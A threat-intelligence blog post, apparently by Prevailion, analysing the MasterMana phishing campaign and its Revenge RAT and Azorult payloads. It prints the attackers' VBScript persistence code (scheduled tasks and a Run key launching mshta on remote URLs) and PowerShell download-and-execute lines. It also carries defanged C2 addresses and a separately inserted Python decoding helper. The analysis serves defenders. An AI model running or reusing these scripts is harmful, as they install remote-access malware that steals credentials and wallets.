Wednesday, October 2, 2019

MasterMana BotNet

The MasterMana Botnet: Anatomy of the $160 Dollar Hack


The team at Prevailion has uncovered new details concerning “MasterMana Botnet,” an ongoing cyber-crime campaign that hits all of the cyber bingo buzzwords: business email compromise, backdoors, and cryptocurrency wallets. There are indications this operation — which targeted corporations around the world for less than the cost of a night at the baseball park — was still active as late as 24 September 2019.

This operation, which began as early as December of 2018, appears financially motivated, given the seemingly indiscriminate targeting of business email addresses via phishing and the inclusion of specific functions to steal information associated with cryptocurrency wallets. Based upon exhibited tactics, techniques, and procedures (TTPs), we have associated it — with moderate confidence — to the “Gorgon Group”, a well known group active for numerous years that has been known to straddle the line between cybercrime and intelligence operations.

Once the victims opened the phishing email, they found an infected document attachment. Opening the infected document initiated the attack’s multi-pronged, labyrinth-like kill-chain. The layered kill-chain approach aids in evading detection by relying upon trust placed in a number of third-party websites and services, such as Bitly, Blogspot, and Pastebin, as opposed to exclusively using actor-controlled domains. The threat actors also took the additional steps of modifying older Pastebin posts to cease execution, as well as adding features to avoid some automated detection, such as sandboxing.

Ultimately the victim would download a .NET dll that would perform process hollowing and load a fileless backdoor — either a variant of Azorult or Revenge Rat. The team at Prevailion determined that the threat actors used Revenge Rat, a well-known remote access trojan (RAT) tool that could be found online for free, through the week of September 15th, at which time they switched to Azorult, a well-known trojan previously for sale on certain forums for $100US.

The Azorult trojan was designed to steal usernames, passwords, cookies, web history, and cryptocurrency wallets. It also contained functionality to enumerate the host, upload files, download files, and take screenshots of the victim’s machine. This functionality could allow an actor to deploy additional payloads, such as cryptominers and ransomware.

In addition to aiding in detection avoidance, using third-party services also enabled the threat actors to conduct the campaign at minimal cost. Leasing Virtual Private Servers (VPS) costs an estimated $60US, and Azorult versions were available for under $100US via Russian-based cyber-crime forums earlier this year.

This particular campaign highlights the asymmetric nature of these threats. As companies increasingly spend more money on security solutions, threat actors are able to operate on shoestring budgets. In this case, the threat actors struck a perfect balance: sophisticated enough to avoid automated detection through third-party services and obfuscation while remaining below APT-level sophistication to avoid drawing attention to their campaign.

These new details about the wide-scale targeting of this ongoing campaign — dubbed “MasterMana Botnet” — highlight the potential impact of moderately sophisticated campaigns to all corporations and organizations. While most companies fear they may become compromised by advanced actors, this particular report highlights that actors do not have to rely on advanced tools or techniques to have a serious business impact.

We recommend a defense-in-depth strategy with multiple security solutions including properly configured firewalls, email protection, and end-point antivirus solutions.

While the infection mechanism relied upon semi-trusted third party sites, the use of commonly available backdoors made this attack easy to stop for updated and properly-configured endpoint solutions.

Campaign Walk Through

Step 1 - Phishing E-Mails

One observed infection vector used by these threat actors was trojanized Excel documents sent to victims via email. The emails appeared to impersonate business dealings by sending the recipients invoices and product requirements.

In one case, an email impersonated a small legitimate company based in Dubai, UAE. Both of the emails that we discovered were sent from free email providers, such as Yahoo and Yandex.

Phishing email sent from free webmail provider to potential victim

Phishing email sent from a potentially compromised account

Step 2 - Infected Document Attachments

Once the victim received the email, presumably they would then download the infected file attachment. In one case, the Excel document attachment would prompt the victim to then enable a macro. Once macros were enabled, the VBS script would reach out to a Bitly link.

In another instance, a different Microsoft Excel file was attached, which used the Dynamic Data Exchange (DDE) exploit, CVE-2017-11826. Similar to the previous sample, when the document was opened, the OLE object automatically reached out to an embedded Bitly link.

Additionally, we saw references in the code that indicated the threat actors could have trojanized the following Microsoft file formats:

Step 3 - Bitly Link Redirection to “TeamMana” Blogspot

The victim machine would then attempt to resolve the embedded Bitly link. Once the link was expanded, it would direct the victim to an actor-controlled hostname associated with Blogspot.

The team at Prevailion observed the same hostname in use across multiple campaigns; however, the expanded Bitly links correlated to different URLs. One of the more popular campaigns occurred in late August and continued through September. This particular link appeared to have been clicked approximately 2200 times by end users located around the globe.

Bitly metrics showing the number of times the link has been clicked associated with the September 9th Campaign 

Bitly metrics showing the number of times the link has been clicked associated with the September 15th Campaign 

Once expanded, the Bitly links would bring the victim to a URL associated with the hostname myownteammana[.]blogspot[.]com. If the website was visited in a web browser, the site appeared benign. Upon further inspection, however, we discovered the presence of malicious JavaScript within the webpage.

Screenshot of the actor-controlled blogspot webpage

Once the embedded JavaScript was decoded, it revealed a VBScript that ran mshta.exe on code found at a Pastebin URL.

Step 4 - Creating Scheduled Tasks and Registry Keys

The Pastebin URL would reveal another JavaScript snippet. Similar to the previous step, the Pastebin file was a URL-encoded VBScript that was obfuscated using some simple tricks, such as string reversals and unnecessary concatenations, to avoid detection. Once deobfuscated, the script would kill any running instances of MS Word, Excel, PowerPoint, and Publisher.

Next, it would attempt to create scheduled tasks and modify a registry key to obtain the next payload. One interesting aspect was the inclusion of a time delay on the scheduled task, which likely aided in avoiding detection by a certain sandbox environment that may have had a timer of five minutes.

At the end of September, the threat actor began modifying their TTPs to use three scheduled tasks and one registry key, instead of two. These scheduled tasks would kick off after six minutes then five hours and then ten hours. Then, the registry key instance would persist after a reboot.

<script language="VBScript">
CreateObject("WScript.Shell").Run "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit", vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 06 /tn ""Windows Update"" /tr ""mshta.exe{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 300 /tn ""Update"" /tr ""mshta.exe{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 600 /tn ""Genuine"" /tr ""mshta.exe{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate","mshta.exe{Specific URL}","REG_EXPAND_SZ"
Self.close </script>

Step 5 -  Downloading and Loading the Trojan

Once the scheduled tasks and registry keys were created, they were then populated with the contents of another Pastebin URL. Interestingly, our team noticed that some of the older Pastebin posts were modified to cease execution of the kill-chain.

We assess that these older Pastebin posts were almost certainly modified by the threat actor, potentially after a set period of time. This suggests that the threat actors are taking steps to remove older links, thereby protecting their tools and operations. One of the active links provided a URL-encoded string that decoded to the text below.

Screenshot of the URL decoded VBScript

That PowerShell command was obfuscated both by reversing the order of the string and by expressing it as comma-delimited, base-10 CharCode. One of the tools that we used in decoding these various commands was CyberChef.

Screenshot of CyberChef, using the “Reverse” and “From Charcode” modules to deobfuscate the script

The plaintext PowerShell script used in the September 15th campaign can be viewed below.

[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/{Specific URL}')|IEX;
[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/{Specific URL}').replace('!#@','0x')|IEX;

Prior to the 15th, the threat actors used a slightly modified script. This older variant had certain functionality to confirm that the machine had access to the internet before running. The variant also used MSBuild.exe. We suspect the adversary chose MSBuild because it is a signed Microsoft binary, and using this process could allow them to bypass some application whitelisting controls on the host as they used it to execute arbitrary code.

do {$ping = test-connection -comp -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'{Specific URL}')|IEX;
[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'{Specific URL}').replace('#!','0x')|IEX;
[email protected]('MSBuild.exe',$f);

The first Pastebin sample downloaded by the script was heavily obfuscated. Once it was URL-decoded, it revealed a PowerShell script that was obfuscated using base-10 CharCode. The deobfuscated text revealed another large string of hex characters. However, to further evade detection and obfuscate the code, the “0x” that typically precedes the hex was replaced with “%_”. The PowerShell would replace “%_” with “0x” right before execution. Once the replacement was complete, we were able to extract a Dynamic-Link Library (.dll) written in .NET.

The second Pastebin sample we downloaded from the script was only semi-obfuscated. Similar to the previous samples, the threat actors prepended “!#@” to the hex characters, likely to evade detection. However, prior to execution, the string “!#@” would be replaced with “0x” to yield a fully functional RAT.
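The decoding chain from Step 5 (URL-decode, reverse, from-charcode, then swap the actor's marker back to “0x” and parse the [Byte[]] literal into bytes), written out as an added Python helper for analysts. This is not code from the report or from Prevailion; the marker strings come from the text above, and the paste it decodes is a constructed five-byte sample, not a real Pastebin post.

```python
"""Peel the obfuscation layers described in Step 5 of the report (constructed example)."""
import re
from urllib.parse import quote, unquote

# Strings the pastes substituted for the "0x" hex prefix, as noted in the report.
HEX_MARKERS = ("!#@", "%_", "#!")


def decode_reversed_charcode(blob: str) -> str:
    """The PowerShell command was stored reversed and as comma-delimited base-10
    char codes, i.e. CyberChef 'Reverse' followed by 'From Charcode'."""
    codes = blob.strip()[::-1]
    return "".join(chr(int(c)) for c in codes.split(",") if c.strip())


def find_hex_marker(text: str):
    """Return the marker used in place of '0x', or None when the hex is unaltered."""
    for marker in HEX_MARKERS:
        if marker in text:
            return marker
    return None


def restore_byte_array(text: str) -> bytes:
    """Put '0x' back (mirroring the script's own .replace()) and parse the
    [Byte[]] literal into the raw bytes that would have been handed to the injector."""
    marker = find_hex_marker(text)
    restored = text.replace(marker, "0x") if marker else text
    return bytes(int(h, 16) for h in re.findall(r"0x([0-9A-Fa-f]{2})", restored))


def is_pe_image(data: bytes) -> bool:
    """Both the .NET DLL and the RAT are PE files and start with the 'MZ' DOS header."""
    return data[:2] == b"MZ"


def triage_paste(raw_paste: str) -> dict:
    """Run every layer in the order the report describes and summarise the result."""
    decoded = decode_reversed_charcode(unquote(raw_paste))
    payload = restore_byte_array(decoded)
    return {
        "marker": find_hex_marker(decoded),
        "size": len(payload),
        "is_pe": is_pe_image(payload),
    }


# Constructed sample (not a real Pastebin post): a five-byte [Byte[]] literal using
# the "%_" marker, pushed through the same layers in the forward direction.
SAMPLE_PLAINTEXT = "[Byte[]]$f='%_4D,%_5A,%_90,%_00,%_03';"


def build_sample(plaintext: str) -> str:
    """Forward direction: charcode -> reverse -> URL-encode (only to make test input)."""
    charcodes = ",".join(str(ord(ch)) for ch in plaintext)
    return quote(charcodes[::-1], safe="")


if __name__ == "__main__":
    print(triage_paste(build_sample(SAMPLE_PLAINTEXT)))
```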

Step 6 - Analysis of the Process Hollower and Trojan

The .NET DLL sample associated with this particular campaign was obfuscated using an open-source project called “ConfuserEx” from GitHub. Thankfully, “de4dot” is another available open-source project, which can be used to deobfuscate the samples.

This DLL serves as a process hollowing injector targeting “notepad.exe”, as described in Step 5 above. It is passed a byte array with the PE data from the PowerShell script. It looks for notepad.exe in windows\syswow64 and then calls “MyVictim.tickleme”, which zeros the PE headers in the buffer and calls VOVO.FUN.

VOVO.FUN then launches notepad, unmaps the existing section, allocates a new buffer in the notepad process, writes the additional payload into the process, and resumes the thread. This allowed the threat actors to never write the malware to disk. The actors maintained persistence through scheduled tasks, which periodically grab the injector and RAT and hollow out the memory of a process that points to a valid image on disk.

Screenshot of the process hollowing dll

In an operation that occurred on September 9th, 2019, the threat actors deployed Revenge Rat. 
This particular agent communicated with a DuckDNS domain, hxxp://speeddfox[.]duckdns[.]org, and it generated a mutex string named "WindowsUpdateSysten32". These characteristics, such as the use of Revenge Rat and the mutex string, allowed us to draw parallels to a campaign previously reported by other security firms, which they associated with the “Gorgon Group”.

Screenshot of the Revenge Rat’s C2 and MUTEX string

Approximately one week later, on September 15th, we observed an evolution of TTPs, using Azorult, in lieu of Revenge Rat. Azorult was a well-known trojan, and this particular variant was written in Delphi. As noted by other security researchers, Azorult has been available for sale on Russian forums at prices ranging up to $100US.

While this trojan may have been older, it was still highly effective. Most of the functionality was geared towards harvesting credentials that could be found on the victim machine — e.g., email accounts, messenger applications (e.g., Pidgin, Psi+, Telegram), web cookies, browser history, and cryptocurrency wallets.

Functionality to harvest cryptocurrency wallets

It also had traditional trojan functionalities, such as host-based enumeration and the ability to upload and download files, as well as take screenshots. Once the trojan had obtained the information, it would then communicate with a hard-coded IP address; two such C2 were hxxp://216.170.126[.]146/2ky/index.php and hxxp:// We assess that these threat actors likely configured their C2s using another GitHub Project.

Pastebin Insights

A review of the open-sourced insights from Pastebin provided a couple of interesting takeaways and insights into this campaign. 

The threat actors’ use of third-party websites, such as Bitly, Blogspot, and Pastebin, was likely done to evade detection, as those sites would have been less likely to arouse suspicion from network defenders. Yet websites such as Bitly and Pastebin keep metrics on how many times a certain link has been visited. We were able to determine who created this particular Pastebin post and summarize how many times it had been visited.

For example, we observed that the URL that hosted the Revenge Rat sample had been viewed over 3300 times. This suggests that there are 3300 machines that were affected by this campaign. However, because the threat actors used a known trojan, the number of machines affected could be much lower, as many machines may have had antivirus products in place.

Pastebin URL ending in “LJV1Hn3g” which decodes to Revenge Rat

Pastebin URL ending in “xAnP1Xjc” which decodes to Azorult Rat

We noticed that, six days later, the same Pastebin creator “hagga” created a new post that decoded to the aforementioned Azorult trojan. With a little over 1000 views, if these two operations are representative of a standard week, we surmise that these threat actors potentially interacted with approximately 2000 machines per week. While this number likely does not reflect the number of actively compromised machines by this threat actor, it does provide us with a snapshot to better understand the breadth of their operations.

Upon further inspection of the Pastebin creator “hagga”, it appears that this Pastebin account was created on December 3rd, 2018. Thus, we suspect this activity has been occurring since that time. We also discovered one interesting Pastebin post title: “MasterManabots-all-bots”. From this, and the reference to “Mana” in the blogspot hostname, we suspect the actors refer to this campaign as the “MasterMana Botnet”.

Screenshot of the Pastebin post ending in “cUcUDfLf” called “Mastermanbots-all-bots”


We found two aspects of this campaign particularly interesting:

      The cost for the threat actors to deploy and maintain the campaign was virtually nonexistent.
      The campaign showed a very specific level of sophistication, tailored intentionally to evade detection.

Regarding the low monetary cost associated with this campaign, we observed that the threat actors leaned heavily on various third-party services. For example, they sent malicious documents using free web mail accounts. They then could have used an open-source project to generate a DDE payload or macro and had the macro reach out to a Bitly link. This link then resolved to a free Blogspot site, hosted by Google, which redirected to various Pastebin sites. Finally, they used an older trojan that likely cost approximately $100. Thus, the only real cost associated with this particular campaign appears to be that of leasing the VPSs.

Based on the level of sophistication displayed in this campaign, we believe that the threat actors struck a sweet spot. The longevity of this campaign can be partially attributed to the threat actors’ ability to avoid using popular commodity malware, such as Emotet. Simultaneously, they avoided the use of (and subsequently, the potential burning of) zero-day exploits and custom backdoors. We speculate that this helped them obtain a higher return on investment, since they weren’t spending significant resources on tools and exploits.

This campaign’s threat actors saw an opportunity and appear to have carved out a nice niche for themselves. We suspect that this particular threat actor is likely to continue operations, as previous public reporting has not deterred them, therefore we wanted to highlight their new modus operandi, so that network defenders may more easily identify their operations.

About Prevailion

Prevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.

To learn more about Prevailion, visit

Indicators of Compromise

Campaign 1 - Revenge Rat (September 9th)

Xls File: 680056b56c29afcce275de93ac5bb06076358410c05caae7f19572909d2d6071

Campaign 2 - Azorult (15 September)

Campaign 3 - Azorult (24 September)

Emails (Sha256 Hashes)

Trojanized Documents

Bitly URLs

.Net DLL used to Process Hollowing

Revenge RAT

Delphi version of Azorult RAT

Command and Control Nodes

